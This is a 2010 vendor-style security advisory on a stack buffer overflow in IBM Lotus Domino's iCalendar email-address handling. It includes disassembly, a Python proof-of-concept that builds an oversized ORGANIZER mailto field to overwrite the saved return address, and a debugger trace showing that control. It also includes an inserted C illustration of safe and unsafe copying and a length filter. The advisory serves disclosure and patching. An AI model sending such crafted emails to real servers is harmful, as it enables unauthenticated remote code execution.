MWR InfoSecurity Security Advisory. IBM Lotus Domino iCalendar Email Address Stack Buffer Overflow Vulnerability. 14th September 2010


Document footer date: 2010-11-12

CONTENTS

1 Detailed Vulnerability Description
  1.1 Introduction
  1.2 Technical Background
  1.3 Exploit Information
  1.4 Dependencies
2 Recommendations

IBM Lotus Domino iCalendar Email Address Stack Buffer Overflow Vulnerability

Package Name:             Lotus Domino Server
Date Reported:            2010-01-09
Affected Versions:        Versions 8.0 and 8.5 on AIX, AIX 64bit, Linux, Linux iSeries, Linux zSeries, Solaris, Windows, Windows 64bit, z/OS
CVE Reference:            Not Yet Assigned
Author:                   A. Plaskett
Severity:                 High Risk
Local/Remote:             Remote
Impact:                   The vulnerability would enable an attacker to execute arbitrary code on the system in the context of the currently executing nrouter process.
Vulnerability Class:      Stack based buffer overflow
Vendor URL:               http://www.ibm.com
Version:                  8.0, 8.5
Vendor Response:          A patch is available from: http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515
Exploit Details Included: Yes (Proof of concept code included).

Overview:
An unauthenticated remote code execution vulnerability was identified in the code handling the conversion and checking of an iCalendar email address parameter. An overly large email address string can lead to the overflow of a stack allocated buffer due to insufficient bounds checking when a Cstrcpy (string copy) is performed. A remote, unauthenticated attacker could execute code in the context of the Lotus Domino server process (nrouter.exe) by sending a specially crafted malicious email to the Lotus Domino SMTP server.

Impact:
The vulnerability would enable an attacker to execute arbitrary code on the system in the context of the currently executing nrouter process. In the majority of installations this will be with local SYSTEM privileges. This could also be used to disrupt legitimate access to the services provided.

Cause:
This vulnerability is caused by the lack of bounds checking when performing a string copy operation (Cstrcpy) into a fixed size stack based buffer.

Interim Workaround:
It may be possible to filter malicious mails of this type out using upstream filtering. However, full mitigation will require patching of the Domino server.

Solution:
It is recommended that the vendor supplied patch is installed from http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515

1 Detailed Vulnerability Description

1.1 Introduction

Lotus Domino is currently developed by IBM and described by the vendor as follows:

  IBM Lotus Domino software is a world class platform for critical business, collaboration, and messaging applications. It delivers highly reliable, scalable, and security-rich applications at a low total cost of ownership, helping companies enhance the productivity of people, streamline business processes and improve overall business responsiveness.

  Source: http://www-01.ibm.com/software/lotus/products/domino/features.html

iCalendar is described as follows:

  iCalendar is an Internet standard (RFC 2445) for deploying interoperable calendaring and scheduling services for the Internet. The standard is sometimes referred to as iCal. The iCalendar format is suitable as an exchange format between applications or systems, thereby allowing users of different Internet mail applications to exchange calendar information. iCalendar information is formatted as a Multipurpose Internet Mail Extensions (MIME) content type: text/calendar. MIME enables the object to be exchanged using several transports, including SMTP, HTTP, a file system, and desktop interactive protocols such as the clipboard or drag-and-drop interactions, point-to-point asynchronous communication, and wired-network transport. iCalendar allows users to send meeting requests and tasks to other users through email. Recipients of the iCalendar email (with supported software) can respond to the sender easily, or they can counter-propose another meeting date or time. iCalendar is implemented and supported by a large number of products.

  Source: http://www.ibm.com/developerworks/lotus/library/notes85-icalendar/index.html

1.2 Technical Background

The vulnerability exists due to a lack of bounds checking performed in the function nnotes!mailcheck821address before performing a string copy operation (Cstrcpy):

  .text:602738F7 push esi
  .text:602738F8 push edx
  .text:602738F9 call Cstrcpy

The ESI register holds the source address of the copy, which is read from the iCalendar email and so is under an attacker's control. The EDX register holds the address of the fixed size stack buffer. Consequently, the Cstrcpy operation can be passed a string which overflows the fixed size stack based buffer and causes memory corruption. This memory corruption can be used to hijack the flow of execution of the program and execute arbitrary code.
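The C below is an added illustration, not IBM's or MWR's code, of the defect class described in the Technical Background and of the length check that the Interim Workaround's "upstream filtering" amounts to in practice. It places the unbounded copy into a fixed-size stack buffer (the shape of the Cstrcpy call above) next to a form that refuses input which does not fit before copying, and adds a per-line check that flags iCalendar ORGANIZER/ATTENDEE mailto addresses at or beyond a chosen size. ADDR_BUF_SIZE, the function names and the constructed inputs are assumptions; the advisory does not state the real buffer size inside nnotes.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not IBM's or MWR's code.  ADDR_BUF_SIZE is an assumed
 * buffer size for illustration; the advisory does not state the real one. */
#define ADDR_BUF_SIZE 256

/* Vulnerable pattern (the shape of the advisory's Cstrcpy call): the address
 * is copied into a fixed-size stack buffer with no length check, so input of
 * ADDR_BUF_SIZE bytes or more writes past the buffer into the stack frame.
 * Returns 1 if the address contains an '@', 0 otherwise. */
int check_address_unsafe(const char *addr)
{
    char buf[ADDR_BUF_SIZE];
    strcpy(buf, addr);                    /* unbounded copy: the defect */
    return strchr(buf, '@') != NULL;
}

/* Hardened form: establish that the input fits before touching the buffer,
 * then copy a known number of bytes and terminate explicitly.
 * Returns -1 for input that does not fit, otherwise as above. */
int check_address_safe(const char *addr)
{
    char buf[ADDR_BUF_SIZE];
    const char *nul = memchr(addr, '\0', ADDR_BUF_SIZE);
    if (nul == NULL)
        return -1;                        /* no terminator within the buffer size: refuse */
    size_t len = (size_t)(nul - addr);
    memcpy(buf, addr, len);
    buf[len] = '\0';
    return strchr(buf, '@') != NULL;
}

/* Case-insensitive search for "mailto:" (the advisory's sample message uses
 * both "mailto:" and "Mailto:"); returns a pointer just past it, or NULL. */
static const char *find_mailto(const char *line)
{
    static const char key[] = "mailto:";
    const size_t klen = sizeof key - 1;
    for (const char *p = line; *p != '\0'; p++) {
        size_t i = 0;
        while (i < klen && p[i] != '\0' && tolower((unsigned char)p[i]) == key[i])
            i++;
        if (i == klen)
            return p + klen;
    }
    return NULL;
}

/* Upstream-filter check for one iCalendar content line (ORGANIZER, ATTENDEE):
 * returns 1 if the line carries a mailto address of `limit` bytes or more,
 * i.e. one that an unbounded copy into a `limit`-byte buffer would overflow. */
int ical_mailto_too_long(const char *line, size_t limit)
{
    const char *addr = find_mailto(line);
    size_t len = 0;
    if (addr == NULL)
        return 0;
    while (addr[len] != '\0' && addr[len] != ';' && addr[len] != ',' &&
           addr[len] != '\r' && addr[len] != '\n')
        len++;
    return len >= limit;
}

/* Constructed test input (assumed, not from the advisory): an ORGANIZER line
 * whose domain part is n_chars filler bytes, mimicking the sample's shape. */
static char g_line[16384];

const char *constructed_long_line(size_t n_chars)
{
    static const char prefix[] = "ORGANIZER:mailto:H@";
    static const char suffix[] = ".com";
    size_t plen = sizeof prefix - 1;
    size_t max_fill = sizeof g_line - plen - sizeof suffix;
    if (n_chars > max_fill)
        n_chars = max_fill;
    memcpy(g_line, prefix, plen);
    memset(g_line + plen, 'A', n_chars);
    memcpy(g_line + plen + n_chars, suffix, sizeof suffix); /* copies the NUL too */
    return g_line;
}

/* The address portion of the same constructed line (after "ORGANIZER:mailto:"). */
const char *constructed_long_address(size_t n_chars)
{
    return constructed_long_line(n_chars) + strlen("ORGANIZER:mailto:");
}

int main(void)
{
    const char *ok = "ORGANIZER:mailto:alice@example.com";
    printf("normal line flagged: %d\n", ical_mailto_too_long(ok, ADDR_BUF_SIZE));
    printf("long line flagged:   %d\n",
           ical_mailto_too_long(constructed_long_line(3000), ADDR_BUF_SIZE));
    printf("safe check on long address: %d\n",
           check_address_safe(constructed_long_address(3000)));
    return 0;
}
```

The safe form deliberately decides before copying: it looks for a terminator within the buffer size and refuses anything longer, rather than truncating silently, so a caller sees an error instead of a mangled address. The line filter reuses the same limit, which is how a mail gateway can apply the workaround without knowing Domino's internal buffer size exactly: pick a limit no larger than any plausible fixed buffer and reject or quarantine lines that exceed it.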

1.3 Exploit Information

An attacker could exploit this vulnerability by crafting an email containing an iCalendar with an email address string which is sufficiently long to overwrite stack based variables and also overwrite the saved return address which is stored in the stack frame (the required string length being 2374 bytes). The attacker could then pass an address which would be used to overwrite the saved return address. When the function returns, the return address is popped off the stack and loaded into the EIP (Extended Instruction Pointer) register. At this point, the attacker has full control over the execution of the program and can execute their desired code.

The following proof of concept Python code excerpt can be used to trigger the vulnerability with the malicious ORGANIZER mailto address:

  # Marker value that lands on the saved return address (0x42424242)
  ret_address = "BBBB"
  # 2374 bytes of padding reach the saved return address; trailing filler follows it
  overflow = ("A" * 2374) + ret_address + ("C" * 6632)
  organiser = "ORGANIZER:mailto:H@%s.com" % overflow
  body = """Content-Type: text/calendar; method=counter; charset="utf-8"
  Subject: sent_mail2.txt
  MIME-Version: 1.0
  Content-Transfer-Encoding: 8bit

  BEGIN:VCALENDAR
  METHOD:COUNTER
  PRODID:-//HGOPO@VDGCOHBCOGHRO@GQHOOPGHHCCCGCBGGCLGMCPN//
  VERSION:2.0
  BEGIN:VEVENT
  UID:KORBOOGGGOHGNIH
  SEQ:2
  RRULE:aaaa
  %s
  ATTENDEE;:Mailto:aaaa@localdomain
  SUMMARY:PGOMG@OMPGR@KOFMEOPNCMH
  DTSTART:20091130T093000Z
  DTEND:20091130T093000Z
  DTSTAMP:20091130T083147Z
  LOCATION:Location
  STATUS:aaaa
  END:VEVENT
  END:VCALENDAR
  """ % organiser

If this email is delivered to a Lotus Domino SMTP server, nrouter will perform the following calls:

  0833519c 60ca844c 094dddb8 nnotes!mailcheck821address+0xb07
  0833519c 00000019 083200f8 nnotes!note2ical+0x1c25c
  0000000a 083200f8 094de824 nnotes!ical2notesextract+0x247
  000000c7 06e41f62 083210ac nrouter+0x3ee9e
  00000063 000000c7 06e41f62 nrouter+0x3f1cd
  02a19f58 00000000 000000c7 nrouter+0x1c433
  004673a0 00000000 03f23325 nrouter+0x1ddd0
  004673a0 21700001 00000001 nrouter+0x1e3a5
  029b0000 00000000 00000000 nrouter+0x1e6ed
  00000000 094dffd4 7751b3f5 nnotes!osprocessisgui+0xef
  00000000 7e454e05 00000000 kernel32!basethreadinitthunk+0x12
  600fe640 00000000 00000000 ntdll!rtlinitializeexceptionchain+0x63
  600fe640 00000000 00000000 ntdll!rtlinitializeexceptionchain+0x36

leading to the incorrectly bounded Cstrcpy function being called and the return address being overwritten with 42424242, which will then be loaded into the EIP register. At this point the attacker has full control over the flow of execution of the program (nrouter.exe).

1.4 Dependencies

In order to exploit this vulnerability an attacker would need to know the email address of a valid Lotus Domino mailbox account. It should be noted, however, that no user interaction is required for the vulnerability to be triggered (nrouter will process the email automatically).

2 Recommendations

It is recommended that all users install the appropriate security patch released by the vendor in response to this issue. Links to the updated software can be found at the following location:

  http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515

MWR InfoSecurity
St. Clement House, 1-3 Alencon Link, Basingstoke, RG21 7SB
Tel: +44 (0)1256 300920
Fax: +44 (0)1256 844083
mwrinfosecurity.com